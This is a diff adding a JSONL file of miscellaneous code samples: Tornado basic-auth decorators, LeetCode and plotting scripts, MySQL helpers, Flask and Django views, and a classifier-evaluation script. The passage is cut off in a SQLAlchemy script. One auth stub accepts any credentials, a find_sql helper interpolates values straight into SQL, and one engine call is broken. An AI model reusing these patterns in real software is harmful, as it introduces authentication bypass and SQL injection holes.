diff --git "a/4939.jsonl" "b/4939.jsonl" new file mode 100644--- /dev/null +++ "b/4939.jsonl" @@ -0,0 +1,766 @@ +{"seq_id":"31070803","text":"import base64\r\n\r\n'''\r\nExample usage:\r\n\r\ndef check_credentials(user, pwd):\r\n return user == 'foo'\r\n\r\n@basic_auth(check_credentials)\r\nclass MyHandler(tornado.web.RequestHandler):\r\n pass\r\n \r\n'''\r\n\r\n\r\ndef basic_auth(auth_func=lambda *args, **kwargs: True, after_login_func=lambda *args, **kwargs: None, realm='Restricted'):\r\n \r\n def basic_auth_decorator(handler_class):\r\n def wrap_execute(handler_execute):\r\n def require_basic_auth(handler, kwargs):\r\n def create_auth_header():\r\n handler.set_status(401)\r\n handler.set_header('WWW-Authenticate', 'Basic realm=%s' % realm)\r\n handler._transforms = []\r\n handler.finish()\r\n\r\n auth_header = handler.request.headers.get('Authorization')\r\n\r\n if auth_header is None or not auth_header.startswith('Basic '):\r\n create_auth_header()\r\n else:\r\n auth_decoded = base64.decodestring(auth_header[6:])\r\n user, pwd = auth_decoded.split(':', 2)\r\n\r\n if auth_func(user, pwd):\r\n after_login_func(handler, kwargs, user, pwd)\r\n else:\r\n create_auth_header()\r\n\r\n def _execute(self, transforms, *args, **kwargs):\r\n require_basic_auth(self, kwargs)\r\n return handler_execute(self, transforms, *args, **kwargs)\r\n\r\n return _execute\r\n\r\n handler_class._execute = wrap_execute(handler_class._execute)\r\n return handler_class\r\n \r\n return basic_auth_decorator\r\n\r\n \r\n #=================================================================\r\n \r\n \r\n \r\n'''\r\nExample usage:\r\n\r\n@httpauth\r\nclass SessionCreateHandler(tornado.web.RequestHandler):\r\n @allowedRole('administrator')\r\n def get(self):\r\n # Contains user found in previous auth\r\n print self.request.headers.get('auth')\r\n self.write('ok')\r\n \r\n-or-\r\n\r\n@httpauth\r\nclass SessionCreateHandler(tornado.web.RequestHandler):\r\n @allowedRole(['administrator', 'super-administrator'])\r\n def get(self):\r\n # Contains user found in previous auth\r\n print self.request.headers.get('auth')\r\n self.write('ok')\r\n''' \r\n \r\n \r\nimport base64\r\n \r\ndef _checkAuth(login, password):\r\n ''' Check user can access or not to this element '''\r\n # TODO: return None if user is refused\r\n # TODO: do database check here, to get user.\r\n return {\r\n 'login': 'okay',\r\n 'password': 'okay',\r\n 'role': 'okay'\r\n }\r\n \r\ndef httpauth(handler_class):\r\n ''' Handle Tornado HTTP Basic Auth '''\r\n def wrap_execute(handler_execute):\r\n def require_auth(handler, kwargs):\r\n auth_header = handler.request.headers.get('Authorization')\r\n \r\n if auth_header is None or not auth_header.startswith('Basic '):\r\n handler.set_status(401)\r\n handler.set_header('WWW-Authenticate', 'Basic realm=Restricted')\r\n handler._transforms = []\r\n handler.finish()\r\n return False\r\n \r\n auth_decoded = base64.decodestring(auth_header[6:])\r\n login, password = auth_decoded.split(':', 2)\r\n auth_found = _checkAuth(login, password)\r\n \r\n if auth_found is None:\r\n handler.set_status(401)\r\n handler.set_header('WWW-Authenticate', 'Basic realm=Restricted')\r\n handler._transforms = []\r\n handler.finish()\r\n return False\r\n else:\r\n handler.request.headers.add('auth', auth_found)\r\n \r\n return True\r\n \r\n def _execute(self, transforms, *args, **kwargs):\r\n if not require_auth(self, kwargs):\r\n return False\r\n return handler_execute(self, transforms, *args, **kwargs)\r\n \r\n return _execute\r\n \r\n 
handler_class._execute = wrap_execute(handler_class._execute)\r\n return handler_class\r\n\r\n\r\n# The _checkAuth should return a user object, and this\r\n# configure which property from that objet get the 'role'\r\n_userRolePropertyName = 'role'\r\n \r\ndef _checkRole(role, roles):\r\n ''' Check given role is inside or equals to roles '''\r\n # Roles is a list not a single element\r\n if isinstance(roles, list):\r\n found = False\r\n for r in roles:\r\n if r == role:\r\n found = True\r\n break\r\n \r\n if found == True:\r\n return True\r\n \r\n # Role is a single string\r\n else:\r\n if role == roles:\r\n return True\r\n \r\n return False\r\n \r\n \r\ndef allowedRole(roles = None):\r\n def decorator(func):\r\n def decorated(self, *args, **kwargs):\r\n user = self.request.headers.get('auth')\r\n \r\n # User is refused\r\n if user is None:\r\n raise Exception('Cannot proceed role check: user not found')\r\n \r\n role = user[_userRolePropertyName]\r\n \r\n if _checkRole(role, roles) == False:\r\n self.set_status(403)\r\n self._transforms = []\r\n self.finish()\r\n return None\r\n \r\n return func(self, *args, **kwargs)\r\n return decorated\r\n return decorator\r\n \r\n \r\ndef refusedRole(roles = None):\r\n def decorator(func):\r\n def decorated(self, *args, **kwargs):\r\n user = self.request.headers.get('auth')\r\n \r\n # User is refused\r\n if user is None:\r\n raise Exception('Cannot proceed role check: user not found')\r\n \r\n role = user[_userRolePropertyName]\r\n \r\n if _checkRole(role, roles) == True:\r\n self.set_status(403)\r\n self._transforms = []\r\n self.finish()\r\n return None\r\n \r\n return func(self, *args, **kwargs)\r\n return decorated\r\n return decorator\r\n","sub_path":"WebServices/BasicAuthentication.py","file_name":"BasicAuthentication.py","file_ext":"py","file_size_in_byte":5989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"182297491","text":"# https://oj.leetcode.com/problems/max-points-on-a-line/\n\nclass Solution:\n # @param points, a list of Points\n # @return an integer\n def maxPoints(self, points):\n n = len(points)\n if n == 0:\n return 0\n if n == 1:\n return 1\n return max([self.maxCount(points, p) for p in points])\n\n def maxCount(self, points, p):\n d = {}\n cnt = 0\n for p1 in points:\n if p1.x == p.x and p1.y == p.y:\n cnt += 1\n continue\n dx, dy = p1.x - p.x, p1.y - p.y\n g = self.gcd(dx, dy)\n slop = (dx / g, dy / g)\n if slop not in d:\n d[slop] = 0\n d[slop] += 1\n\n if len(d) == 0:\n return cnt\n\n return max(d.values()) + cnt\n\n def gcd(self, a, b):\n if b == 0:\n return a\n if a == 0:\n return b\n return self.gcd(b, a % b)\n","sub_path":"leetans/maxPoints.py","file_name":"maxPoints.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"23780984","text":"import numpy as np\nimport matplotlib.pyplot as plt \n\n\nloss = []\npearson = []\nwith open('val.log','r') as f:\n for i in f:\n # print(i.split('\\t')[1].split('(')[1].split(',')[0])\n # exit()\n pearson.append(float(i.split('\\t')[2]))\n loss.append(float(i.split('\\t')[1].split('(')[1].split(',')[0])*25)\n# print(pearson)\n# print(loss)\n# exit()\n\nx=np.arange(105)\n\n\nl1=plt.plot(x[:22],pearson[:22],'-',label='Pearson')\n# l1=plt.plot(x[:22],loss[:22],'-',label='Loss')\n\n\n# l2=plt.plot(x2,y2,'g--',label='type2')\n# l3=plt.plot(x3,y3,'b--',label='type3')\n# plt.plot(x,loss,'b.')#,x2,y2,'g+-',x3,y3,'b^-')\nplt.title('Validation 
Evaluation')\nplt.xlabel('Epoch')\nplt.ylabel('Evaluation')\nplt.legend()\nplt.show()\n\n","sub_path":"code/stswp/result/0.60 48--64/read.py","file_name":"read.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"435317529","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nimport pymysql\nimport configparser\nimport common_util\n\n# Create your models here.\n\ndef get_db_connect(logger):\n \"\"\"\n MySQL Connection\n :return: DB object\n \"\"\"\n try:\n conf_file = common_util.conf_file\n parser = configparser.RawConfigParser()\n parser.read(conf_file)\n db = pymysql.connect(\n host = common_util.config.get('sql', 'host'),\n user = common_util.config.get('sql', 'user'),\n passwd = common_util.config.get('sql', 'passwd'),\n db = common_util.config.get('sql', 'db')\n )\n return db\n except Exception as e:\n logger.msg_logger(\"Error get_db_connect : \" + str(e))\n raise Exception(str(e))\n\n\ndef insert_sql(logger, table_name, data):\n try:\n ret_status = False\n db = get_db_connect(logger)\n cursor = db.cursor()\n query = 'insert into %s(%s) values(%s)' % (table_name, ','.join([key for key in data]),','.join(['%s' for _ in data]))\n values = tuple([value for key,value in data.items()])\n cursor.execute(query,(values))\n db.commit()\n logger.msg_logger('>>>>>>>> MYSQL Insert Success : %s || %s' % (query, str(data)))\n ret_status = True\n except Exception as e:\n logger.msg_logger('Error insert_sql : %s | %s'%(str(e),query))\n finally:\n if db : db.close()\n return ret_status\n\n\ndef find_sql(logger, table_name,filters,columns=''):\n try:\n data = None\n db = get_db_connect(logger)\n cursor = db.cursor(pymysql.cursors.DictCursor)\n\n if columns:\n columns = ','.join(columns)\n else:\n columns = '*'\n\n params = ''\n for key,value in filters.items():\n params += \"%s = '%s' AND \"%(key,value)\n params = params[:-5] # Removing AND\n\n query = 'SELECT %s FROM %s WHERE %s'%(columns,table_name,params)\n cursor.execute(query)\n data = cursor.fetchall()\n except Exception as e:\n logger.msg_logger('find_sql : %s | %s'%(str(e),query))\n finally:\n if db: db.close()\n return data\n\n\n","sub_path":"eth_auxpay_py/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"249426876","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom tensorflow.keras.preprocessing.image import img_to_array, load_img\nfrom tensorflow.keras.applications.mobilenet_v2 import preprocess_input\nfrom tensorflow.keras.models import load_model\nfrom detector import violaJones_face_detection, dnn_face_detection\nimport os\nfrom sklearn.metrics import classification_report, precision_recall_curve, \\\n roc_auc_score, average_precision_score, auc\nfrom sklearn.preprocessing import LabelBinarizer\nfrom tensorflow.keras.utils import to_categorical\n\n# face detection options (Just to make the code clean)\nfd_options = {\n 'ViolaJones': violaJones_face_detection,\n 'DNN': dnn_face_detection\n}\n# default classifier model and detection method\nDEFAULT_CLASSIFIER_PATH = \"experiments/classifier3/classifier3.model\"\nDEFAULT_TEST_DIRECTORIES = [\"data/test/test_images/\",\n \"data/test/test_images2/\",\n \"data/test/jean_louis_mask_dataset/\",\n \"data/test/Pamir_Amiry_Data_Set/\",\n \"data/test/Aggrim_Arora_Data/\",\n \"data/test/christian_augustyn_data\",\n 
\"data/test/martin_dataset\",\n ]\n\n\n# Note: THIS FUNCTION IS TO EVALUATE THE MODELS AND COMPARE THEM\n# for all images in the test directories,\n# detects faces and labels as mask or no mask with the provided model\n# then compares classifier output with the real labels at 0.5 threshold and prints success rate\n# returns true labels and classifier output for further investigation.\ndef test_model_on_test_images(classifier_path=None, fd_method='DNN', test_directories=None,\n PR_curve=False, threshold=0.5):\n categories = [\"with_mask\", \"without_mask\"]\n\n # set directory of the test data\n if test_directories is not None:\n test_dir = test_directories\n else:\n test_dir = DEFAULT_TEST_DIRECTORIES\n\n # set the face detector function\n face_detect = fd_options[fd_method]\n\n # Load the model\n if classifier_path is None:\n model = load_model(DEFAULT_CLASSIFIER_PATH)\n else:\n model = load_model(classifier_path)\n\n # real labels\n labels = []\n # predicted labels\n pred_labels = []\n # loop through all the images in the test folder detect and label faces and save predicted labels and real ones\n for directory in test_dir:\n for category in categories:\n path = os.path.join(directory, category)\n for img in os.listdir(path):\n\n img_path = os.path.join(path, img)\n try:\n image = load_img(img_path) # load the image\n except:\n continue\n image = img_to_array(image)\n faces = face_detect(image)\n for x1, y1, x2, y2 in faces:\n # crop the detected face from the frame and preprocess the image\n face = image[y1:y2, x1:x2, :]\n if face.shape[0] == 0 or face.shape[1] == 0:\n continue\n face = cv2.resize(face, (224, 224))\n face = img_to_array(face)\n face = preprocess_input(face) # preprocessing the data for the mobileNetV2 CNN\n face = np.expand_dims(face, axis=0)\n\n # predicted label\n predIdxs = model.predict(face)[0]\n pred_labels.append(predIdxs)\n # real label\n labels.append(category)\n\n lb = LabelBinarizer()\n labels = lb.fit_transform(labels)\n labels = to_categorical(labels)\n # real and predicted label\n labels = np.array(labels)\n pred_labels = np.array(pred_labels)\n pred_labels_t = np.zeros(pred_labels.shape[0])\n pred_labels_t[pred_labels[:, 1] > threshold] = 1\n print(classification_report(labels.argmax(axis=1), pred_labels_t))\n # for example for label 0:\n # precision: the number of correcly reported 0s/ the number of all reported 0s\n # (what percent of algorhtm's 0s were real 0s)\n # recall: the number of correcly reported 0s/ the number of all 0s\n # (what percent of data's 0s the algorithm caught)\n if PR_curve:\n precision, recall, thresholds = \\\n precision_recall_curve(y_true=labels.argmax(axis=1), probas_pred=pred_labels[:, 0], pos_label=0)\n plt.plot(recall, precision)\n plt.show()\n\n return labels, pred_labels\n\n\ndef script():\n # the desired recall threshold\n T = 0.95\n\n # load the models and get the predictions.\n C123_path = \"./experiments/classifier123/classifier123.model\"\n C5_path = \"./experiments/classifier5/classifier5.model\"\n C_all_path = \"./experiments/classifier_all/classifier_all.model\"\n print(\"C-123 with threshold 0.5\")\n lbls, C123_probs = test_model_on_test_images(C123_path)\n print(\"C-5 with threshold 0.5\")\n lbls, C5_probs = test_model_on_test_images(C5_path)\n print(\"C-all with threshold 0.5\")\n lbls, C_all_probs = test_model_on_test_images(C_all_path)\n\n # calculate precision and recall at different thresholds\n precision123, recall123, thresholds123 = \\\n precision_recall_curve(y_true=lbls.argmax(axis=1), 
probas_pred=C123_probs[:, 1], pos_label=1)\n precision5, recall5, thresholds5 = \\\n precision_recall_curve(y_true=lbls.argmax(axis=1), probas_pred=C5_probs[:, 1], pos_label=1)\n precision_all, recall_all, thresholds_all = \\\n precision_recall_curve(y_true=lbls.argmax(axis=1), probas_pred=C_all_probs[:, 1], pos_label=1)\n\n # calculate F1 score at different thresholds\n F123 = 2 * precision123 * recall123 / (precision123 + recall123)\n F5 = 2 * precision5 * recall5 / (precision5 + recall5)\n F_all = 2 * precision_all * recall_all / (precision_all + recall_all)\n\n # find maximum F1 score index\n maxFind123 = F123.argmax()\n maxFind5 = F5.argmax()\n maxFind_all = F_all.argmax()\n\n # print information of the point with maximum F1 score\n print(\"maximum F1 score is:\\nC-123:{}\\nC-5:{}\\nC-all:{}\\n\".format(\n F123[maxFind123],\n F5[maxFind5],\n F_all[maxFind_all])\n )\n print(\"threshold at maximum F1 score is:\\nC-123:{}\\nC-5:{}\\nC-all:{}\\n\".format(\n thresholds123[maxFind123],\n thresholds5[maxFind5],\n thresholds_all[maxFind_all])\n )\n print(\"recall at maximum F1 score is:\\nC-123:{}\\nC-5:{}\\nC-all:{}\\n\".format(\n recall123[maxFind123],\n recall5[maxFind5],\n recall_all[maxFind_all])\n )\n print(\"precisions at maximum F1 score is:\\nC-123:{}\\nC-5:{}\\nC-all:{}\\n\".format(\n precision123[maxFind123],\n precision5[maxFind5],\n precision_all[maxFind_all])\n )\n\n # finding T sensitivity threshold index\n opt_ind123 = np.where(recall123 >= T)\n opt_ind5 = np.where(recall5 >= T)\n opt_ind_all = np.where(recall_all >= T)\n\n o123 = (opt_ind123[0][-1])\n o5 = (opt_ind5[0][-1])\n o_all = (opt_ind_all[0][-1])\n\n # print information of the point with desired recall\n print(\"threshold for minimum {} recall is:\\nC-123:{}\\nC-5:{}\\nC-all:{}\\n\"\n .format(T,\n thresholds123[o123],\n thresholds5[o5],\n thresholds_all[o_all])\n )\n print(\"recall for minimum {}% recall is:\\nC-123:{}\\nC-5:{}\\nC-all:{}\\n\"\n .format(T,\n recall123[o123],\n recall5[o5],\n recall_all[o_all])\n )\n print(\"precision for minimum {}% recall is:\\nC-123:{}\\nC-5:{}\\nC-all:{}\\n\"\n .format(T,\n precision123[o123],\n precision5[o5],\n precision_all[o_all])\n )\n\n # draw pr curves\n fig, ax = plt.subplots()\n ax.plot(recall123[:-1], precision123[:-1], label=\"C-123\", color='c')\n ax.plot(recall5[:-1], precision5[:-1], label=\"C-5\", color='m')\n ax.plot(recall_all[:-1], precision_all[:-1], label=\"C-all\", color='y')\n ax.plot(recall123[o123], precision123[o123], 'xc', label=\"C-123 {} sensitivity point\".format(T))\n ax.plot(recall5[o5], precision5[o5], 'xm', label=\"C-5 {} sensitivity point\".format(T))\n ax.plot(recall_all[o_all], precision_all[o_all], 'xy', label=\"C-all {} sensitivity point\".format(T))\n ax.plot(recall123[maxFind123], precision123[maxFind123], '*c', label=\"C-123 maximum F1 point\")\n ax.plot(recall5[maxFind5], precision5[maxFind5], '*m', label=\"C-5 maximum F1 point\")\n ax.plot(recall_all[maxFind_all], precision_all[maxFind_all], '*y', label=\"C-all maximum F1 point\")\n ax.axvline(T, linestyle='--', color='k', linewidth=0.5)\n # ax.set_xticks(list(ax.get_xticks()[:-1]) + [0.97])\n ax.set_xlim([0.5, 1])\n ax.legend()\n ax.set_xlabel(\"Recall\")\n ax.set_ylabel(\"Precision\")\n fig.savefig(\"./prcurves.png\")\n fig.show()\n\n # individual precision and recall against threshold\n fig, ax = plt.subplots()\n ax.plot(thresholds123, precision123[:-1], label=\"precision\")\n ax.plot(thresholds123, recall123[:-1], label=\"recall\")\n ax.plot(thresholds123, F123[:-1], label=\"F1 
score\")\n ax.plot(thresholds123[o123], precision123[o123], 'xk', label=\"recall is at least {}\".format(T))\n ax.plot(thresholds123[o123], recall123[o123], 'xk')\n ax.plot(thresholds123[o123], F123[o123], 'xk')\n ax.plot(thresholds123[maxFind123], precision123[maxFind123], 'xr', label=\"maximum F1 score\")\n ax.plot(thresholds123[maxFind123], recall123[maxFind123], 'xr')\n ax.plot(thresholds123[maxFind123], F123[maxFind123], 'xr')\n ax.set_xlabel(\"Threshold\")\n ax.legend()\n ax.set_title(\"C-123 precision and recall curve\")\n ax.axhline(T, linestyle='--', color='k', linewidth=0.5)\n # ax.set_yticks(list(ax.get_yticks()[:-1]) + [0.97])\n fig.savefig(\"./p&rcurve_c_123.png\")\n fig.show()\n\n fig, ax = plt.subplots()\n ax.plot(thresholds5, precision5[:-1], label=\"precision\")\n ax.plot(thresholds5, recall5[:-1], label=\"recall\")\n ax.plot(thresholds5, F5[:-1], label=\"F1 score\")\n ax.plot(thresholds5[o5], precision5[o5], 'xk', label=\"recall is at least {}\".format(T))\n ax.plot(thresholds5[o5], recall5[o5], 'xk')\n ax.plot(thresholds5[o5], F5[o5], 'xk')\n ax.plot(thresholds5[maxFind5], precision5[maxFind5], 'xr', label=\"maximum F1 score\")\n ax.plot(thresholds5[maxFind5], recall5[maxFind5], 'xr')\n ax.plot(thresholds5[maxFind5], F5[maxFind5], 'xr')\n ax.set_xlabel(\"Threshold\")\n ax.legend()\n ax.set_title(\"C-5 precision and recall curve\")\n ax.axhline(T, linestyle='--', color='k', linewidth=0.5)\n # ax.set_yticks(list(ax.get_yticks()[:-1]) + [0.97])\n fig.savefig(\"./p&rcurve_c_5.png\")\n fig.show()\n\n fig, ax = plt.subplots()\n ax.plot(thresholds_all, precision_all[:-1], label=\"precision\")\n ax.plot(thresholds_all, recall_all[:-1], label=\"recall\")\n ax.plot(thresholds_all, F_all[:-1], label=\"F1 score\")\n ax.plot(thresholds_all[o_all], precision_all[o_all], 'xk', label=\"recall is at least {}\".format(T))\n ax.plot(thresholds_all[o_all], recall_all[o_all], 'xk')\n ax.plot(thresholds_all[o_all], F_all[o_all], 'xk')\n ax.plot(thresholds_all[maxFind_all], precision_all[maxFind_all], 'xr', label=\"maximum F1 score\")\n ax.plot(thresholds_all[maxFind_all], recall_all[maxFind_all], 'xr')\n ax.plot(thresholds_all[maxFind_all], F_all[maxFind_all], 'xr')\n ax.set_xlabel(\"Threshold\")\n ax.legend()\n ax.set_title(\"C-all precision and recall curve\")\n ax.axhline(T, linestyle='--', color='k', linewidth=0.5)\n # ax.set_yticks(list(ax.get_yticks())[:-1] + [0.97])\n fig.savefig(\"./p&rcurve_c_all.png\")\n fig.show()\n\n # evaluate the models with more generic metrics\n # (over the whole threshold range, which is better on average?)\n print(\"general evaluation metrics:\")\n print(\"AP C-123: {}\"\n .format(average_precision_score(y_true=lbls.argmax(axis=1),\n y_score=C123_probs[:, 1],\n pos_label=1)))\n print(\"AP C-5: {}\"\n .format(average_precision_score(y_true=lbls.argmax(axis=1),\n y_score=C5_probs[:, 1],\n pos_label=1)))\n print(\"AP C-all: {}\"\n .format(average_precision_score(y_true=lbls.argmax(axis=1),\n y_score=C_all_probs[:, 1],\n pos_label=1)))\n print()\n print(\"AUC-ROC C-123: {}\"\n .format(roc_auc_score(y_true=lbls.argmax(axis=1),\n y_score=C123_probs[:, 1])))\n print(\"AUC-ROC C-5: {}\"\n .format(roc_auc_score(y_true=lbls.argmax(axis=1),\n y_score=C5_probs[:, 1])))\n print(\"AUC-ROC C-all: {}\"\n .format(roc_auc_score(y_true=lbls.argmax(axis=1),\n y_score=C_all_probs[:, 1])))\n print()\n print(\"AUC-PR C-123: {}\"\n .format(auc(recall123, precision123)))\n print(\"AUC-PR C-5: {}\"\n .format(auc(recall5, precision5)))\n print(\"AUC_PR C-all: {}\"\n 
.format(auc(recall_all, precision_all)))\n print()\n\n\nif __name__ == '__main__':\n script()\n","sub_path":"evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":13239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"9791762","text":"#!/nokia/apps/tww/@sys/bin/python\n#-*- coding=utf-8 -*-\n\nimport binascii, string, sys, os, getopt\n\nversion = int(sys.version[0])\n\ndef getStrings(s):\n a,b = s.split(' \"')\n b = b.strip().replace('\"', \"\")\n if b.endswith(\"0000\"):\n b = b[:-4]\n if version == 3:\n b = bytes.fromhex(b)\n else:\n b = binascii.a2b_hex(b)\n return a.strip(), b.decode(\"utf-16-be\").encode('utf-8')\n\ndef searchStr(a,b, s):\n \"\"\"\n if s is empty, return True to display everyone\n \"\"\"\n if not s:\n return True\n\n if a.lower().find(s.lower()) != -1:\n return True\n else:\n return False\n\ndef usage():\n print(\"\"\"Usage: \n decode_prompt.py ppm/xxxxx.dat [search string (ignorecase)]\n i.e.: python decode_prompt.py english-gb_english-us.txt.dat call_repeat\n\n this script will save \"result.txt\" file in current directory.\n\"\"\")\n\ndef parse_argv(argv):\n try:\n opts, args = getopt.getopt(argv, \"hs\", [\"help\", \"screen\"])\n out = {}\n\n if len(args) == 1:\n out['f'] = args[0]\n elif len(args) == 2:\n out['f'] = args[0]\n out['s'] = args[1]\n else:\n usage()\n sys.exit(0)\n return out\n except getopt.GetoptError:\n usage()\n return out\n\nif __name__ == \"__main__\":\n if len(sys.argv) > 1:\n param = parse_argv(sys.argv[1:]) \n\n lines = open(param['f']).readlines()\n findStr = ''\n if version == 3:\n if 's' in list(param.keys()):\n findStr = param['s']\n else:\n if 's' in param.keys():\n findStr = param['s']\n\n result = []\n for i in range(5, len(lines)):\n a,b = getStrings(lines[i])\n if searchStr(a, b, findStr):\n if version == 3:\n result.append(a+\" = \"+b.decode('utf-8'))\n else:\n result.append(a+\" = \"+b)\n\n if version == 3:\n open(\"./result.txt\", \"wb\").write(\"\\n\".join(result).encode(\"utf-8\"))\n else:\n open(\"./result.txt\", \"wb\").write(\"\\n\".join(result))\n print(\"the result has saved in ./result.txt\")\n else:\n usage()\n\n\n","sub_path":"py/decode_prompt.py","file_name":"decode_prompt.py","file_ext":"py","file_size_in_byte":2200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"646688894","text":"from flask import Flask, render_template, request\nimport os\n\n# EB looks for an 'application' callable by default.\n# EB looks for an 'application' callable by default.\nproject_root = os.path.dirname(__file__)\ntemplate_path = os.path.join(project_root, 'Templates')\napplication = Flask(__name__, template_folder=template_path, static_url_path=\"\", static_folder=\"Static\")\n\n# use decorators to link the function to a url\n@application.route('/', methods=['GET', 'POST'])\ndef home():\n\tif request.method == 'GET':\n\t\treturn render_template('index.html')\n\t\n@application.errorhandler(404)\ndef page_not_found(e):\n return render_template('index.html'), 404\n\n# run the app.\nif __name__ == \"__main__\":\n\t# Setting debug to True enables debug output. 
This line should be removed before deploying a production app.\n\tapplication.run(debug=False) ","sub_path":"eb-flask/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"21807842","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.generic import ListView\nfrom .models import Entry\nfrom .forms import EntryCreationForm, EditorForm\nfrom django.utils import timezone\nfrom django.http import JsonResponse\n\ndef entry_required(f):\n def wrap_function(request, entry_id, *args, **kwargs):\n try:\n entryInstance = Entry.objects.get(uuid=entry_id, author=request.user)\n except:\n return redirect('missing')\n return f(request, entry_id, *args, **kwargs, entryInstance=entryInstance)\n return wrap_function\n\n@login_required\ndef dashboard(request):\n entryList = Entry.objects.filter(author=request.user).order_by('dateTime')\n return render(request, 'diary/dashboard.html', {'entry_list': entryList})\n\n@login_required\n@entry_required\ndef entry(request, entry_id, entryInstance):\n return render(request, 'diary/entry.html', {'entry': entryInstance})\n\n@login_required\ndef create_entry(request):\n if request.method == 'POST':\n form = EntryCreationForm(request.POST)\n if form.is_valid():\n newEntry = Entry(title=form.cleaned_data['title'], location=form.cleaned_data['location'], author=request.user)\n newEntry.save()\n return redirect('diary:entry', entry_id=newEntry.uuid)\n else:\n form = EntryCreationForm()\n\n return render(request, 'diary/create_entry.html', {'date_created': timezone.now(), 'form': form})\n\n@login_required\n@entry_required\ndef edit(request, entry_id, entryInstance):\n if request.method == 'POST':\n # Is no error, then it is an autosave update\n try:\n request.POST['is_autosave_update']\n\n entryInstance.content = request.POST['content']\n entryInstance.save()\n print('saved: ' + entryInstance.content)\n return JsonResponse(data={}, status=200)\n\n except KeyError:\n form = EditorForm(request.POST)\n if form._errors:\n return redirect('missing', {'error': form._errors})\n\n content = form.data['editor']\n # files = form.files\n entryInstance.content = content\n entryInstance.save()\n return redirect('diary:entry', entry_id=entryInstance.uuid)\n else:\n form = EditorForm()\n return render(request, 'diary/edit.html', {'entry': entryInstance, 'form': form, 'initial_content': entryInstance.content})","sub_path":"diary/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"328103783","text":"from sqlalchemy import create_engine,MetaData, select,update\nfrom sqlalchemy.orm import Session\n# import pandas as pd \n# import numpy\nimport csv\nimport math\nfrom sqlalchemy import and_\nfrom sqlalchemy.engine.default import DefaultDialect\nfrom sqlalchemy.sql.sqltypes import String, DateTime, NullType\nfrom sqlalchemy.sql import func,and_\nimport datetime\nimport email\nimport smtplib\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom email.mime.base import MIMEBase\nfrom decouple import config\n# import pdb; pdb.set_trace()\n\n\ndef iso_data_fetch_calc():\n print(\"fn inside\")\n # engine = create_engine(\"mysql+pymysql://\",config('iso_calc_user'),\":\",config('iso_calc_localhost'),\"/\",config('database'))\n 
engine = create_engine(\"mysql+pymysql://\",config('user'),\":\",config('password'),\"@\",config('localhost'),\"/\",config('database'))\n print(\"add\")\n metadata = MetaData()\n metadata.reflect(bind = engine)\n conn = engine.connect()\n validation_dct={}\n noondata = metadata.tables['NOONDATA']\n print(\"bh\")\n iso_parameter = metadata.tables['ISOPARAMETER']\n vessel_details=metadata.tables['VESSELDETAIL']\n validation=metadata.tables['ISO_VALIDATION']\n #for previous data also cmnt # if(obj_noon[17]!='NULL' and obj_noon[17]!=0):\n # \tiso_noon_stw=float(obj_noon[17])\n # else: at line 139\n # noon_parameter = conn.execute(select([noondata.c.Vessel_Name,noondata.c.SOG,noondata.c.DRAFT_AFT,noondata.c.DRAFT_FWD,noondata.c.DISPLACEMENT,noondata.c.RPM,noondata.c.Power_corrected,noondata.c.WindDirection,noondata.c.WindSpeed_kn,noondata.c.COURSE_AT_SEA,noondata.c.UID,noondata.c.FUEL_M_E_HS,noondata.c.FUEL_M_E_LS,noondata.c.FUEL_M_E_MDO,noondata.c.FUEL_M_E_MGO_HS,noondata.c.FUEL_M_E_MGO_LS,noondata.c.M_E_FUEL_ONLY_STEAMING_TIME]).where(and_(noondata.c.Vessel_Name=='MNP',noondata.c.CAA==0)).fetchall()\n #for new data having stw\n lst=[]\n noon_parameter = conn.execute(select([noondata.c.Vessel_Name,noondata.c.SOG,noondata.c.DRAFT_AFT,noondata.c.DRAFT_FWD,noondata.c.DISPLACEMENT,noondata.c.RPM,noondata.c.Power_corrected,noondata.c.WindDirection,noondata.c.WindSpeed_kn,noondata.c.COURSE_AT_SEA,noondata.c.UID,noondata.c.FUEL_M_E_HS,noondata.c.FUEL_M_E_LS,noondata.c.FUEL_M_E_MDO,noondata.c.FUEL_M_E_MGO_HS,noondata.c.FUEL_M_E_MGO_LS,noondata.c.M_E_FUEL_ONLY_STEAMING_TIME,noondata.c.STW,noondata.c.REPORT_DATE_TIME]).where(noondata.c.REPORT_DATE_TIME>='2020-01-01 00:00:00')).fetchall()\n\n # noon_parameter = conn.execute(select([noondata.c.Vessel_Name,noondata.c.SOG,noondata.c.DRAFT_AFT,noondata.c.DRAFT_FWD,noondata.c.DISPLACEMENT,noondata.c.RPM,noondata.c.Power_corrected,noondata.c.WindDirection,noondata.c.WindSpeed_kn,noondata.c.COURSE_AT_SEA,noondata.c.UID,noondata.c.FUEL_M_E_HS,noondata.c.FUEL_M_E_LS,noondata.c.FUEL_M_E_MDO,noondata.c.FUEL_M_E_MGO_HS,noondata.c.FUEL_M_E_MGO_LS,noondata.c.M_E_FUEL_ONLY_STEAMING_TIME,noondata.c.STW]).where(and_(noondata.c.Vessel_Name=='PCO',noondata.c.CAA==0))).fetchall()\n \n # noon_parameter = 